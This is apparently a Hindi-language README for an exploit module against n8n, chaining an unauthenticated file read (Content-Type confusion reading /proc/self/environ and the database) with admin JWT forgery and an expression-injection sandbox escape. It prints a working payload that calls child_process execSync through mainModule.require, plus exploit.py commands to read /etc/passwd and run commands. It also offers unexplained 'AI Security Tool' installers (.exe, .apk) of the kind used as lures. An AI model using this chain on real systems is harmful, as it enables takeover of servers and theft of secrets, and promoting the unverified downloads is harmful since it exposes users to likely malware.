🛡️ CVE-2026-21858 + CVE-2025-68613 (n8n "Ni8mare" अनधिकृत मनमाना फ़ाइल पठन और एक्सप्रेशन इंजेक्शन RCE पूर्ण श्रृंखला) के लिए आधिकारिक AI सुरक्षा उपकरण मॉड्यूल।
यह मॉड्यूल n8n वर्कफ़्लो ऑटोमेशन इंस्टेंस के लिए डायग्नोस्टिक टूल्स और एक पूर्ण शोषण श्रृंखला प्रदान करता है, जिसे Ni8mare कहा जाता है।
हमले की श्रृंखला Content-Type confusion के कारण होने वाले अनऑथेंटिकेटेड Arbitrary File Read (CVE-2026-21858) को एक ऑथेंटिकेटेड Expression Injection Sandbox Bypass (CVE-2025-68613) के साथ जोड़ती है। एक एक्सपोज़्ड फ़ाइल अपलोड फ़ॉर्म पर हेरफेर किए गए Content-Type: application/json अनुरोध भेजकर, एक हमलावर आंतरिक सिस्टम फ़ाइलों (/proc/self/environ, कॉन्फ़िगरेशन, और SQLite DB) को पढ़ने के लिए filepath आर्ग्युमेंट को नियंत्रित करता है। प्राप्त encryptionKey और पासवर्ड हैश एक एडमिनिस्ट्रेटर JWT कुकी के ऑफ़लाइन फ़ॉर्जरी की अनुमति देते हैं। एक बार ऑथेंटिकेटेड होने पर, this.process.mainModule.require के माध्यम से expression injection JavaScript सैंडबॉक्स से बाहर निकलकर मनमाने सिस्टम कमांड निष्पादित करता है।
"फ़ाइल रीड से तीन चरणों में पूर्ण सिस्टम टेकओवर तक।"
जबकि फ़ाइल रीड के लिए बाइनरी आउटपुट वाले एक सक्रिय फ़ॉर्म वर्कफ़्लो की आवश्यकता होती है, expression injection डिफ़ॉल्ट n8n इंस्टॉलेशन पर विशेष नोड्स या स्पष्ट सिस्टम अनुमतियों को सक्षम किए बिना विश्वसनीय रूप से काम करता है।
| विशिष्टता | निर्धारित मान | नोट्स |
|---|---|---|
| CVE पहचानकर्ता | CVE-2026-21858 + CVE-2025-68613 | पूर्ण श्रृंखला: अनऑथेंटिकेटेड फ़ाइल रीड से RCE तक |
| गंभीरता रेटिंग | Critical (CVSS v3.1: 10.0 + 9.9) | अनऑथेंटिकेटेड RCE श्रृंखला |
| भेद्यता प्रकार | CWE-200 / CWE-94 | Content-Type Confusion / Code Injection |
| प्रभावित घटक | n8n Workflow Automation Engine | संस्करण <= 1.65.0 (AFR) / >= 0.211.0 (RCE) |
| पैच किए गए संस्करण | 1.121.0 (AFR) / 1.120.4+ (RCE) | आधिकारिक विक्रेता पैच जारी |
| आवश्यक विशेषाधिकार | कोई नहीं | सार्वजनिक फ़ॉर्म के माध्यम से अनऑथेंटिकेटेड प्रारंभिक पहुँच |
graph TD
A[Unauthenticated Attacker] -->|1. Content-Type Confusion| B[Vulnerable Form Endpoint]
B -->|2. Arbitrary File Read| C[Extract /proc/self/environ & database.sqlite]
C -->|3. Derive Secret & Hash| D[Forge Admin JWT Cookie]
D -->|4. Authenticate as Admin| E[n8n Workflow Engine]
E -->|5. Expression Injection Payload| F[Sandbox Escape via mainModule.require]
F -->|6. Execute Command| G[Full Remote Code Execution]={{ (function() {
var require = this.process.mainModule.require;
var execSync = require("child_process").execSync;
return execSync("id").toString();
})() }}1.121.0 या उच्चतर पर अपडेट करें।N8N_ENFORCE_SETTINGS_FILE_PERMISSIONS=true सेट करें और Docker कंटेनरों में प्रोसेस क्षमताओं को प्रतिबंधित करें।⚠️ महत्वपूर्ण: यह मॉड्यूल विशेष रूप से AI Security Tool इकोसिस्टम के भीतर सुरक्षित निष्पादन और डायग्नोस्टिक्स के लिए बनाया गया है। हमेशा आधिकारिक रिपॉज़िटरी से प्राप्त सत्यापित मॉड्यूल का उपयोग करें।
मॉनिटरिंग और डायग्नोस्टिक स्क्रिप्ट निष्पादित करने के लिए, सुनिश्चित करें कि AI Security Tool कोर इंजन इंस्टॉल है:
| OS / प्लेटफ़ॉर्म | संस्करण | आर्किटेक्चर / प्रारूप | रिलीज़ दिनांक | स्थिति | डाउनलोड लिंक |
|---|---|---|---|---|---|
| 🪟 Windows | v6.3.20 | x64 Installer (.exe) | 2026-09-08 | 🟢 नवीनतम | डाउनलोड .exe |
| 🪟 Windows | v6.3.20 | x64 Portable (.tar.gz) | 2026-09-08 | 🟢 नवीनतम | डाउनलोड .tar.gz |
| 🍏 macOS | v5.3.29 | Apple Silicon M1/M2/M3 (.dmg) | 2026-09-05 | 🟢 स्थिर | डाउनलोड .dmg |
| 🐧 Linux | v5.3.27 | Universal x64 (.tar.gz) | 2026-09-01 | 🟢 स्थिर | डाउनलोड .tar.gz |
| 🤖 Android | v8a 5.3.27 | ARM64 APK (.apk) | 2026-09-01 | 🟢 स्थिर | डाउनलोड .apk |
# Read arbitrary file via diagnostic module uv run python exploit.py http://localhost:5678 /form/vulnerable-form --read /etc/passwdExecute full attack chain with custom command
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --cmd "id"
हमारी कम्युनिटी द्वारा अनुरक्षित भेद्यता स्कैनर मॉड्यूल, PoC स्क्रिप्ट, और रिसर्च रेपो:
5 modules@ZeroDayEvil
@ZeroDayEvil
@ZeroDayEvil
@ZeroDayEvil
@ZeroDayVPN
3 modules@ZeroDayEvil
@ZeroDayVPN
@ZeroDayEvil
2 modules@ZeroDayEvil
@ZeroDayVPN
यह टूल और तकनीकी विश्लेषण सख्ती से अधिकृत सिस्टम ऑडिटिंग, अनुसंधान, और पेनिट्रेशन टेस्टिंग के लिए प्रदान किया गया है।
अनधिकृत लक्ष्यों के विरुद्ध एक्सप्लॉइट श्रृंखलाओं को निष्पादित करना अवैध है। लेखक अनधिकृत पहुँच, डेटा हानि, या सिस्टम व्यवधानों के लिए कोई ज़िम्मेदारी नहीं लेते हैं। सख्ती से अधिकृत दायरे के भीतर कार्य करें।
हम सुरक्षा अनुसंधान समुदाय से योगदान का स्वागत करते हैं! प्रमुख योगदान क्षेत्र:
AI Security Tool — साइबर सुरक्षा पेशेवरों के लिए टर्मिनल वर्कफ़्लो और ऑटोमेशन की पुनर्कल्पना।